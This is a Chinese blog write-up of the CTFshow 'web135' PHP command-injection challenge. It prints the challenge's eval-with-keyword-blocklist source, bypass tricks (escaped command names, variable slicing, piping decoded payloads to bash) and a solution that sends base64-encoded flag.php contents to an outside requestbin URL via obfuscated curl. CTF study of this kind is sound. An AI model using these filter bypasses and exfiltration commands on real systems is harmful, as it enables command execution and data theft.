CTFshow php特性 web135

最新推荐文章于 2023-10-05 14:55:48 发布
最新推荐文章于 2023-10-05 14:55:48 发布
阅读量1k 收藏
点赞数
分类专栏: CTFshow 文章标签: php bash 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/121994455
版权

目录

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-16 18:48:03

*/

error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("师傅们居然破解了前面的,那就来一个加强版吧");
    }
}

思路

非预期

可以用这些绕过关键字过滤

\
'
"

可以参考下我的博客

https://blog.csdn.net/Kracxi/article/details/121896054

下面可以选一个能用的输出flag,curl不能用可以用ping

od
nl
    nl
    ${PATH:${#TERM}:${SHLVL:~A}}${PATH:${#RANDOM}:${#SHLVL:~A}}
    ${PATH:~A}${PATH:${#RANDOM}:${#SHLVL:~A}}

/bin/cat
    ${HOME:${#}:${##}}???${HOME:${#}:${##}}??${HOME:${#HOSTNAME}:${#SHLVL}}

xxd
less
ca\t
ca''t
more
rev
    /bin/rev

fmt
base64
    /bin/base64
    code=${HOME:${#}:${##}}???${HOME:${#}:${##}}?????${#RANDOM}

tac
| cat的倒序
tail
php /flag
sh /flag      
| 利用报错出flag
paste /flag /etc/passwd    
| 可以两个一起读
diff /flag.txt  /etc/passwd
curl file:///flag
sed -n "p" /flag
bzless /flag
bzmore /flag 
sort
echo "[base64==]" | base64 -d | bash
echo "[hex]" | xxd -r -p | bash

盲注的话可以${string:start:length}来截取字符

题解

cu\rl https://requestbin.net/r/d6dln1sn?q=`ca\t flag.php | gr\ep flag | bas\e64`

在这里插入图片描述

cu\rl https://requestbin.net/r/d6dln1sn?q=`ca\t flag.php | gr\ep flag2 | bas\e64`

在这里插入图片描述
拼一下就好了

总结

Y1ng师傅 yyds

Kradress
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web入门 PHP特性后篇(web133-web150)
ccfly1012的博客
09-13 1834
目录 web133 web134 web135 web136 web137 web138 web139 web140 web141 web142 wen143 web144 web145-web150 web133 error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|net
ctfshow php特性[125-135]
weixin_44770698的博客
01-16 1202
ctfshow php特性125-135
ctfshow web入门 php特性 web131-web135
最新发布
m0_62207170的博客
10-05 620
ctfshow web入门 php特性 web131-web135
ctfshow学习记录-web入门(php特性137-146)
龟速更新的九某人
08-01 1120
ctfshow学习记录-web入门(php特性web137-web146)
ctfshow学习记录-web入门(php特性127-136)
龟速更新的九某人
07-26 1312
ctfshow学习记录-web入门(php特性web127-136)
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
PHP特性(网友根据ctfshow整理)1
08-03
PHP编程语言中,存在一些特定的特性,这些特性可能会对程序的行为产生重大影响,特别是在安全性和逻辑判断方面。以下是一些重要的PHP特性及其详细解释: 1. **弱类型与`==`比较**: PHP支持弱类型,这意味着在...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
CTFShow web入门123-150 (php特性(二))
lonmar的博客
12-05 4145
CTFSHOW PHP特性web123-150
ctfshow php特性 web 89~150plus
shinygod的博客
03-07 690
目录web 92web 93web 94web 95web 96web 97web 98web 99web 100web 101web 102web 103web 104 web 92 num=0x117c intval($num,$base=0) //当base为0时,会自动检测num的进制 //例如:0x117c(16进制) == 4476(十进制) == 010574(8进制) web 93 在这里插入代码片 web 94 web 95 web 96 web 97 web 98 web 99 w
ctfshow web133和其他命令执行的骚操作
Firebasky的博客
10-15 4400
这里是总结自己最近遇到的命令执行题,感觉还是不错分享出来。也欢迎师傅们评论一些骚操作 1. ISITDTU QUALS 2020 REC <?php // error_reporting(E_ALL); // ini_set('display_errors', '1'); function trigonometric_check($code) { // Check length if (strlen($code) >= 0x100) {//256长度 retu.
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5629
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
CTFshow web入门——php特性
小元砸的博客
02-20 5320
Web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
ctfshow php特性
weixin_63231007的博客
06-13 1339
web113 function filter($file){ if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){ die('hacker!'); }else{ return $file; } } $file=$_GET['file']; if(! is_file($file)){ highlight_file(filter($f
ctfshow web入门 特性
weixin_52033041的博客
10-16 2247
Web89 源码: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 15:38:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ include("flag.php"); highlight_fi
ctfshow php特性 web89-web115 web123-150wp
mumuzi的博客
02-01 4274
皮爱吃皮特性
web前端学习135-144(盒子模型---网页布局,盒子模型组成,边框,表格细线边框,盒子实际大小,内边距)
weixin_51249285的博客
01-16 1480
文章目录盒子模型1. 盒子模型1.1 看透网页布局的本质1.2 盒子模型(Box Model)组成1.3 边框(border)1.4 表格的细线边框1.5 边框会影响盒子的实际大小1.6 内边距(padding) 盒子模型 能够准确阐述盒子模型的4个组成部分 能够利用边框复合写法给元素添加边框 能够计算盒子的实际大小 能够利用盒子模型布局模块案例 能够给盒子设置圆角边框 能够给盒子添加阴影 能够给文字添加阴影 1. 盒子模型 页面布局要学习三大核心,盒子模型,浮动和定位学习好盒子模型能非常好的帮助我们布
ctfshow php特性
08-06
引用提到了"ctfshow-php特性-超详解(干货)",它是一篇关于ctfshow php的博客文章。引用和引用则展示了两段关于ctfshow php特性的代码。其中引用是一段关于RCE(远程代码执行)的代码,而引用是一段关于反射类和命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值